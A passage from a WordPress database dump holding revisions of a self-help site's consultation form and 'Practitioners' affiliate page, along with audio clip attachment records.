Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div></div>\r\n<div style="width: 47%; float: left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit" style="margin: 60px auto; float: right;">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</form>\r\n</div>\r\n</div>\r\n</div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-08-26 18:43:50', '2014-08-26 23:43:50', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1354, 4194, '2014-08-27 12:26:59', '2014-08-27 17:26:59', '<h1 style="text-align: center;">Welcome, BeliefCloset Practitioners!</h1>\n<p style="text-align: center;">– . – . – . – . – . –</p>\nThis page contains resources to help you become an <em>Affiliate</em> of Clear Your Beliefs, and to support your work as a Practitioner.\n<p style="text-align: center;">Here is the recording of the August 4th, 2014 call,\n<em><strong>Introducing the Clear Your Beliefs Program to Practitioners:\n</strong></em>(Click to play or right-click to download):</p>\n<span style="color: #008000;"><strong><a title="Clear Your Beliefs Announcement" href="/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3"><span style="color: #008000;">Clear Your Beliefs Announcement</span></a> Call</strong></span>\n<div style="width: 50%; text-align: center;">\n\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs-Announcement-8-4-14-ed.mp3"][/audio]\n\n</div>\n<p style="text-align: center;">Here is the document referred to on the call,\n"<strong><em>Clear Your Beliefs Affiliate Options</em></strong>:"\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB Affiliate Options</a></strong></p>\n<p style="text-align: center;">Register as an Affiliate here:\n<a href="http://clearyourbeliefs.com/affiliate-area"><b>http://clearyourbeliefs.com/affiliate-area</b></a></p>\n<p class="p1" style="text-align: center;"></p>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-autosave-v1', '', '', '2014-08-27 12:26:59', '2014-08-27 17:26:59', '', 1321, 'http://clearyourbeliefs.com/1321-autosave-v1', 0, 'revision', '', 0),
(1355, 4194, '2014-08-26 20:16:18', '2014-08-27 01:16:18', '<h1>Welcome, BeliefCloset Practitioners!</h1>\r\nThis is your page, with resources to help you become an Affiliate of CYB, market your services, and support your work as a Practitioner.\r\n\r\nRecording of the August 4th, 2014 call Introducing the Clear Your Beliefs Program to Practitioners:\r\n<a title="Clear Your Beliefs Announcement" href="/cyb/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3">Clear Your Beliefs Announcement</a>\r\nDownload the document, "Clear Your Beliefs Affiliate Options:"\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB AFFILIATE OPTIONS</a>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-08-26 20:16:18', '2014-08-27 01:16:18', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1356, 4194, '2014-08-26 20:17:26', '2014-08-27 01:17:26', '<h1>Welcome, BeliefCloset Practitioners!</h1>\r\nThis is your page, with resources to help you become an Affiliate of CYB, market your services, and support your work as a Practitioner.\r\n\r\nRecording of the August 4th, 2014 call Introducing the Clear Your Beliefs Program to Practitioners:\r\n<a title="Clear Your Beliefs Announcement" href="/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3">Clear Your Beliefs Announcement</a>\r\nDownload the document, "Clear Your Beliefs Affiliate Options:"\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB AFFILIATE OPTIONS</a>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-08-26 20:17:26', '2014-08-27 01:17:26', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1357, 2, '2014-08-26 20:30:23', '2014-08-27 01:30:23', '<h1>Welcome, BeliefCloset Practitioners!</h1>\r\n.\r\n\r\nThis page contains resources to help you become an Affiliate of Clear Your Beliefs, and support your work as a Practitioner.\r\n\r\nHere is the recording of the August 4th, 2014 call,  <em><strong>Introducing the Clear Your Beliefs Program to Practitioners: </strong></em>\r\n<p style="text-align: center;"><strong>(Click to play or right-click to download):</strong></p>\r\n\r\n<h3 style="text-align: center;"><strong><a title="Clear Your Beliefs Announcement" href="/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3">Clear Your Beliefs Announcement</a></strong></h3>\r\n.\r\n\r\nHere is the document referred to on the call, "<strong><em>Clear Your Beliefs Affiliate Options</em></strong>:"\r\n<h3 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB Affiliate Options</a></h3>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-08-26 20:30:23', '2014-08-27 01:30:23', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1358, 2, '2014-08-26 20:32:24', '2014-08-27 01:32:24', '<h1 style="text-align: center;">Welcome, BeliefCloset Practitioners!</h1>\r\n.\r\n\r\nThis page contains resources to help you become an <em>Affiliate</em> of Clear Your Beliefs, and support your work as a Practitioner.\r\n\r\nHere is the recording of the August 4th, 2014 call,  <em><strong>Introducing the Clear Your Beliefs Program to Practitioners: </strong></em>\r\n<p style="text-align: center;"><strong>(Click to play or right-click to download):</strong></p>\r\n\r\n<h3 style="text-align: center;"><strong><a title="Clear Your Beliefs Announcement" href="/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3">Clear Your Beliefs Announcement</a></strong></h3>\r\n.\r\n\r\nHere is the document referred to on the call, "<strong><em>Clear Your Beliefs Affiliate Options</em></strong>:"  It includes the link\r\n<h3 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB Affiliate Options</a></h3>\r\n&nbsp;\r\n\r\nRegister as an Affiliate here:\r\n<p style="text-align: center;"><b>http://clearyourbeliefs.com/affiliate-area</b></p>\r\n<p class="p1"></p>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-08-26 20:32:24', '2014-08-27 01:32:24', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1359, 2, '2014-08-26 20:33:44', '2014-08-27 01:33:44', '<h1 style="text-align: center;">Welcome, BeliefCloset Practitioners!</h1>\r\n. This page contains resources to help you become an <em>Affiliate</em> of Clear Your Beliefs, and support your work as a Practitioner. Here is the recording of the August 4th, 2014 call,  <em><strong>Introducing the Clear Your Beliefs Program to Practitioners: </strong></em>\r\n<p style="text-align: center;"><strong>(Click to play or right-click to download):</strong></p>\r\n\r\n<h3 style="text-align: center;"><strong><a title="Clear Your Beliefs Announcement" href="/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3">Clear Your Beliefs Announcement</a></strong></h3>\r\n. Here is the document referred to on the call, "<strong><em>Clear Your Beliefs Affiliate Options</em></strong>:"  It includes the link\r\n<h3 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB Affiliate Options</a></h3>\r\nRegister as an Affiliate here:\r\n<p style="text-align: center;"><a href="http://clearyourbeliefs.com/affiliate-area"><b>http://clearyourbeliefs.com/affiliate-area</b></a></p>\r\n<p class="p1"></p>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-08-26 20:33:44', '2014-08-27 01:33:44', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1360, 2, '2014-08-26 20:34:39', '2014-08-27 01:34:39', '<h1 style="text-align: center;">Welcome, BeliefCloset Practitioners!</h1>\r\n. This page contains resources to help you become an <em>Affiliate</em> of Clear Your Beliefs, and support your work as a Practitioner. Here is the recording of the August 4th, 2014 call,  <em><strong>Introducing the Clear Your Beliefs Program to Practitioners: </strong></em>\r\n<p style="text-align: center;"><strong>(Click to play or right-click to download):</strong></p>\r\n\r\n<h3 style="text-align: center;"><strong><a title="Clear Your Beliefs Announcement" href="/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3">Clear Your Beliefs Announcement</a></strong></h3>\r\nHere is the document referred to on the call, "<strong><em>Clear Your Beliefs Affiliate Options</em></strong>:"\r\n<h3 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB Affiliate Options</a></h3>\r\nRegister as an Affiliate here:\r\n<h3 style="text-align: center;"><a href="http://clearyourbeliefs.com/affiliate-area"><b>http://clearyourbeliefs.com/affiliate-area</b></a></h3>\r\n<p class="p1"></p>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-08-26 20:34:39', '2014-08-27 01:34:39', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1361, 2, '2014-08-26 20:38:33', '2014-08-27 01:38:33', '<h1 style="text-align: center;">Welcome, BeliefCloset Practitioners!</h1>\r\n<p style="text-align: center;">– . – . – . – . – . –\r\n\r\nThis page contains resources to help you become an <em>Affiliate</em> of Clear Your Beliefs, and to support your work as a Practitioner.</p>\r\n<p style="text-align: center;">Here is the recording of the August 4th, 2014 call,  <em><strong>Introducing the Clear Your Beliefs Program to Practitioners:\r\n</strong></em>(Click to play or right-click to download):</p>\r\n<p style="text-align: center;"><strong><a title="Clear Your Beliefs Announcement" href="/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3">Clear Your Beliefs Announcement</a></strong></p>\r\n<p style="text-align: center;">Here is the document referred to on the call,\r\n"<strong><em>Clear Your Beliefs Affiliate Options</em></strong>:"\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB Affiliate Options</a></strong></p>\r\n<p style="text-align: center;">Register as an Affiliate here:\r\n<a href="http://clearyourbeliefs.com/affiliate-area"><b>http://clearyourbeliefs.com/affiliate-area</b></a></p>\r\n<p class="p1" style="text-align: center;"></p>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-08-26 20:38:33', '2014-08-27 01:38:33', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1362, 2, '2014-08-26 20:39:38', '2014-08-27 01:39:38', '<h1 style="text-align: center;">Welcome, BeliefCloset Practitioners!</h1>\r\n<p style="text-align: center;">– . – . – . – . – . –</p>\r\nThis page contains resources to help you become an <em>Affiliate</em> of Clear Your Beliefs, and to support your work as a Practitioner.\r\n<p style="text-align: center;">Here is the recording of the August 4th, 2014 call,\r\n<em><strong>Introducing the Clear Your Beliefs Program to Practitioners:\r\n</strong></em>(Click to play or right-click to download):</p>\r\n<p style="text-align: center;"><span style="color: #008000;"><strong><a title="Clear Your Beliefs Announcement" href="/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3"><span style="color: #008000;">Clear Your Beliefs Announcement</span></a> Call</strong></span></p>\r\n<p style="text-align: center;">Here is the document referred to on the call,\r\n"<strong><em>Clear Your Beliefs Affiliate Options</em></strong>:"\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB Affiliate Options</a></strong></p>\r\n<p style="text-align: center;">Register as an Affiliate here:\r\n<a href="http://clearyourbeliefs.com/affiliate-area"><b>http://clearyourbeliefs.com/affiliate-area</b></a></p>\r\n<p class="p1" style="text-align: center;"></p>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-08-26 20:39:38', '2014-08-27 01:39:38', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1363, 4194, '2014-08-27 12:20:15', '2014-08-27 17:20:15', '"Clear Your Beliefs Announcement 8-4-14-ed". Released: 2014.', 'Clear Your Beliefs Announcement 8-4-14-ed', '', 'inherit', 'closed', 'open', '', 'clear-your-beliefs-announcement-8-4-14-ed', '', '', '2014-08-27 12:20:15', '2014-08-27 17:20:15', '', 1321, 'http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs-Announcement-8-4-14-ed.mp3', 0, 'attachment', 'audio/mpeg', 0),
(1365, 4194, '2014-08-27 12:24:07', '2014-08-27 17:24:07', '<h1 style="text-align: center;">Welcome, BeliefCloset Practitioners!</h1>\r\n<p style="text-align: center;">– . – . – . – . – . –</p>\r\nThis page contains resources to help you become an <em>Affiliate</em> of Clear Your Beliefs, and to support your work as a Practitioner.\r\n<p style="text-align: center;">Here is the recording of the August 4th, 2014 call,\r\n<em><strong>Introducing the Clear Your Beliefs Program to Practitioners:\r\n</strong></em>(Click to play or right-click to download):</p>\r\n<p style="text-align: center;"><span style="color: #008000;"><strong><a title="Clear Your Beliefs Announcement" href="/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3"><span style="color: #008000;">Clear Your Beliefs Announcement</span></a> Call</strong></span></p>\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs-Announcement-8-4-14-ed.mp3"][/audio]\r\n<p style="text-align: center;">Here is the document referred to on the call,\r\n"<strong><em>Clear Your Beliefs Affiliate Options</em></strong>:"\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB Affiliate Options</a></strong></p>\r\n<p style="text-align: center;">Register as an Affiliate here:\r\n<a href="http://clearyourbeliefs.com/affiliate-area"><b>http://clearyourbeliefs.com/affiliate-area</b></a></p>\r\n<p class="p1" style="text-align: center;"></p>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-08-27 12:24:07', '2014-08-27 17:24:07', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1364, 4194, '2014-08-27 12:20:29', '2014-08-27 17:20:29', '[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs-Announcement-8-4-14-ed.mp3"][/audio]\r\n<h1 style="text-align: center;">Welcome, BeliefCloset Practitioners!</h1>\r\n<p style="text-align: center;">– . – . – . – . – . –</p>\r\nThis page contains resources to help you become an <em>Affiliate</em> of Clear Your Beliefs, and to support your work as a Practitioner.\r\n<p style="text-align: center;">Here is the recording of the August 4th, 2014 call,\r\n<em><strong>Introducing the Clear Your Beliefs Program to Practitioners:\r\n</strong></em>(Click to play or right-click to download):</p>\r\n<p style="text-align: center;"><span style="color: #008000;"><strong><a title="Clear Your Beliefs Announcement" href="/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3"><span style="color: #008000;">Clear Your Beliefs Announcement</span></a> Call</strong></span></p>\r\n<p style="text-align: center;">Here is the document referred to on the call,\r\n"<strong><em>Clear Your Beliefs Affiliate Options</em></strong>:"\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB Affiliate Options</a></strong></p>\r\n<p style="text-align: center;">Register as an Affiliate here:\r\n<a href="http://clearyourbeliefs.com/affiliate-area"><b>http://clearyourbeliefs.com/affiliate-area</b></a></p>\r\n<p class="p1" style="text-align: center;"></p>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-08-27 12:20:29', '2014-08-27 17:20:29', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1366, 4194, '2014-08-27 12:27:14', '2014-08-27 17:27:14', '<h1 style="text-align: center;">Welcome, BeliefCloset Practitioners!</h1>\r\n<p style="text-align: center;">– . – . – . – . – . –</p>\r\nThis page contains resources to help you become an <em>Affiliate</em> of Clear Your Beliefs, and to support your work as a Practitioner.\r\n<p style="text-align: center;">Here is the recording of the August 4th, 2014 call,\r\n<em><strong>Introducing the Clear Your Beliefs Program to Practitioners:\r\n</strong></em>(Click to play or right-click to download):</p>\r\n<span style="color: #008000;"><strong><a title="Clear Your Beliefs Announcement" href="/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3"><span style="color: #008000;">Clear Your Beliefs Announcement</span></a> Call</strong></span>\r\n<div style="width: 50%; text-align: center;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs-Announcement-8-4-14-ed.mp3"][/audio]\r\n\r\n</div>\r\n<p style="text-align: center;">Here is the document referred to on the call,\r\n"<strong><em>Clear Your Beliefs Affiliate Options</em></strong>:"\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB Affiliate Options</a></strong></p>\r\n<p style="text-align: center;">Register as an Affiliate here:\r\n<a href="http://clearyourbeliefs.com/affiliate-area"><b>http://clearyourbeliefs.com/affiliate-area</b></a></p>\r\n<p class="p1" style="text-align: center;"></p>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-08-27 12:27:14', '2014-08-27 17:27:14', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1367, 4194, '2014-08-27 12:27:45', '2014-08-27 17:27:45', '<h1 style="text-align: center;">Welcome, BeliefCloset Practitioners!</h1>\r\n<p style="text-align: center;">– . – . – . – . – . –</p>\r\nThis page contains resources to help you become an <em>Affiliate</em> of Clear Your Beliefs, and to support your work as a Practitioner.\r\n<p style="text-align: center;">Here is the recording of the August 4th, 2014 call,\r\n<em><strong>Introducing the Clear Your Beliefs Program to Practitioners:\r\n</strong></em>(Click to play or right-click to download):</p>\r\n<span style="color: #008000;"><strong><a title="Clear Your Beliefs Announcement" href="/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3"><span style="color: #008000;">Clear Your Beliefs Announcement</span></a> Call</strong></span>\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs-Announcement-8-4-14-ed.mp3"][/audio]\r\n\r\n</div>\r\n<p style="text-align: center;">Here is the document referred to on the call,\r\n"<strong><em>Clear Your Beliefs Affiliate Options</em></strong>:"\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB Affiliate Options</a></strong></p>\r\n<p style="text-align: center;">Register as an Affiliate here:\r\n<a href="http://clearyourbeliefs.com/affiliate-area"><b>http://clearyourbeliefs.com/affiliate-area</b></a></p>\r\n<p class="p1" style="text-align: center;"></p>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-08-27 12:27:45', '2014-08-27 17:27:45', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1368, 4194, '2014-08-27 12:31:24', '2014-08-27 17:31:24', '<h1 style="text-align: center;">Welcome, BeliefCloset Practitioners!</h1>\r\n<p style="text-align: center;">– . – . – . – . – . –</p>\r\nThis page contains resources to help you become an <em>Affiliate</em> of Clear Your Beliefs, and to support your work as a Practitioner.\r\n<p style="text-align: center;">Here is the recording of the August 4th, 2014 call,\r\n<em><strong>Introducing the Clear Your Beliefs Program to Practitioners:\r\n</strong></em>(Click to play or right-click to download):</p>\r\n<p style="text-align: center;"><span style="color: #008000;"><strong><a title="Clear Your Beliefs Announcement" href="/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3"><span style="color: #008000;">Clear Your Beliefs Announcement</span></a> Call</strong></span></p>\r\n\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs-Announcement-8-4-14-ed.mp3"][/audio]\r\n\r\n</div>\r\n<p style="text-align: center;">Here is the document referred to on the call,\r\n"<strong><em>Clear Your Beliefs Affiliate Options</em></strong>:"\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB Affiliate Options</a></strong></p>\r\n<p style="text-align: center;">Register as an Affiliate here:\r\n<a href="http://clearyourbeliefs.com/affiliate-area"><b>http://clearyourbeliefs.com/affiliate-area</b></a></p>\r\n<p class="p1" style="text-align: center;"></p>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-08-27 12:31:24', '2014-08-27 17:31:24', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1369, 4194, '2014-08-27 14:17:25', '2014-08-27 19:17:25', '"bcp_beneathsurface" from Belief Closet Process by Lion Goodman. Released: 2010.', 'bcp_beneathsurface', '', 'inherit', 'closed', 'open', '', 'bcp_beneathsurface-2', '', '', '2014-08-27 14:17:25', '2014-08-27 19:17:25', '', 1328, 'http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_beneathsurface-_new1.mp3', 0, 'attachment', 'audio/mpeg', 0),
(1370, 4194, '2014-08-27 14:17:34', '2014-08-27 19:17:34', '<h1 style="color: #000000;">Beliefs Beneath the Surface</h1>\r\n<h5 style="color: #000000;">This audio clip is from the <em>Clear Your Beliefs</em> eBook.</h5>\r\n<p style="color: #000000;">The clip will begin immediately. The volume control is on the left of the Player.</p>\r\n<p style="color: #000000;"></p>\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_beneathsurface-_new1.mp3"][/audio]\r\n<p style="color: #000000;"></p>\r\n<p style="color: #000000;">"If you study anything deeply enough, you will find beliefs beneath the surface..."</p>', 'Beliefs Beneath The Surface', '', 'inherit', 'closed', 'open', '', '1328-revision-v1', '', '', '2014-08-27 14:17:34', '2014-08-27 19:17:34', '', 1328, 'http://clearyourbeliefs.com/1328-revision-v1', 0, 'revision', '', 0),
(1371, 4194, '2014-08-27 14:19:36', '2014-08-27 19:19:36', '"bcp_createfeelings" from Belief Closet Process by Lion Goodman. Released: 2010.', 'bcp_createfeelings', '', 'inherit', 'closed', 'open', '', 'bcp_createfeelings-2', '', '', '2014-08-27 14:19:36', '2014-08-27 19:19:36', '', 1335, 'http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_createfeelings1.mp3', 0, 'attachment', 'audio/mpeg', 0),
(1372, 4194, '2014-08-27 14:19:56', '2014-08-27 19:19:56', '<h1 style="color: #000000;"><strong>Beliefs Create Your Feelings</strong></h1>\n<h5 style="color: #000000;">This audio clip is from the  Clear<strong><em> Your Beliefs </em></strong>eBook.</h5>\n<p style="color: #000000;">The clip will begin immediately. The volume control is on the left of the Player.</p>\n<p style="color: #000000;"></p>\n\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_createfeelings1.mp3"][/audio]\n<p style="color: #000000;"></p>\n<p style="color: #000000;">"There''s a direct connection between your beliefs and your feelings, and you can experience it directly..."</p>', 'Beliefs Create Feelings', '', 'inherit', 'closed', 'open', '', '1335-autosave-v1', '', '', '2014-08-27 14:19:56', '2014-08-27 19:19:56', '', 1335, 'http://clearyourbeliefs.com/1335-autosave-v1', 0, 'revision', '', 0),
(1373, 4194, '2014-08-27 14:20:30', '2014-08-27 19:20:30', '<h1 style="color: #000000;"><strong>Beliefs Create Your Feelings</strong></h1>\r\n<h5 style="color: #000000;">This audio clip is from the  Clear<strong><em> Your Beliefs </em></strong>eBook.</h5>\r\n<p style="color: #000000;">The clip will begin immediately. The volume control is on the left of the Player.</p>\r\n<p style="color: #000000;"></p>\r\n<div style="width:50%;margin:0 auto;">\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_createfeelings1.mp3"][/audio]\r\n</div>\r\n<p style="color: #000000;"></p>\r\n<p style="color: #000000;">"There''s a direct connection between your beliefs and your feelings, and you can experience it directly..."</p>', 'Beliefs Create Feelings', '', 'inherit', 'closed', 'open', '', '1335-revision-v1', '', '', '2014-08-27 14:20:30', '2014-08-27 19:20:30', '', 1335, 'http://clearyourbeliefs.com/1335-revision-v1', 0, 'revision', '', 0),
